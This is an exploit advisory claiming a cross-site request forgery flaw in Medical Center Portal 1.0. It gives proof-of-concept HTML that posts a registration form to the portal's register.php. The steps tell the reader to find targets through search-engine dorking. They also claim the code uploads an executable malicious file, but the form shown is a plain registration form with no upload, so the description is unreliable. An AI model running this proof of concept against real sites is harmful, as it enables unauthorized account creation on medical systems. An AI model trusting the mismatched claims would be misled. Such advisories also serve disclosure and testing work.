Headline
Medical Center Portal 1.0 Cross Site Request Forgery
Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : Medical Center Portal 1.0 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 52.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Registration Form</title> <style> body { font-family: Arial, sans-serif; margin: 20px; padding: 20px; max-width: 600px; background-color: #f4f4f4; border-radius: 8px; } .form-container { display: flex; flex-direction: column; } .form-group { margin-bottom: 15px; } .form-group label { font-weight: bold; margin-bottom: 5px; display: block; } .form-group input, .form-group select { padding: 8px; width: 100%; border: 1px solid #ccc; border-radius: 4px; } .form-group select { cursor: pointer; } .form-group button { padding: 10px 15px; background-color: #007bff; color: white; border: none; cursor: pointer; border-radius: 4px; } .form-group button:hover { background-color: #0056b3; } </style></head><body> <h2>Registration Form</h2> <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container"> <div class="form-group"> <label for="firstname">First Name:</label> <input type="text" id="firstname" name="firstname" required> </div> <div class="form-group"> <label for="nid">National ID (NID):</label> <input type="text" id="nid" name="nid" required> </div> <div class="form-group"> <label for="gender">Gender:</label> <select id="gender" name="gender" required> <option value="">Select Gender</option> <option value="male">Male</option> <option value="female">Female</option> </select> </div> <div class="form-group"> <label for="email">Email:</label> <input type="email" id="email" name="email" required> </div> <div class="form-group"> <label for="phonenumber">Phone Number:</label> <input type="text" id="phonenumber" name="phonenumber" required> </div> <div class="form-group"> <label for="jobs">Job:</label> <select id="jobs" name="jobs" required> <option value="">Select Job</option> <option value="doctor">Doctor</option> <option value="nurse">Nurse</option> <option value="pharmacist">Pharmacist</option> </select> </div> <div class="form-group"> <label for="province">Province:</label> <select id="province" name="province" required> <option value="">Select Province</option> <option value="province1">Province 1</option> <option value="province2">Province 2</option> <option value="province3">Province 3</option> </select> </div> <div class="form-group"> <label for="city">City:</label> <select id="city" name="city" required> <option value="">Select City</option> <option value="city1">City 1</option> <option value="city2">City 2</option> <option value="city3">City 3</option> </select> </div> <div class="form-group"> <label for="username">Username:</label> <input type="text" id="username" name="username" required> </div> <div class="form-group"> <label for="password">Password:</label> <input type="password" id="password" name="password" required> </div> <div class="form-group"> <button type="submit">Register</button> </div> </form></body></html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================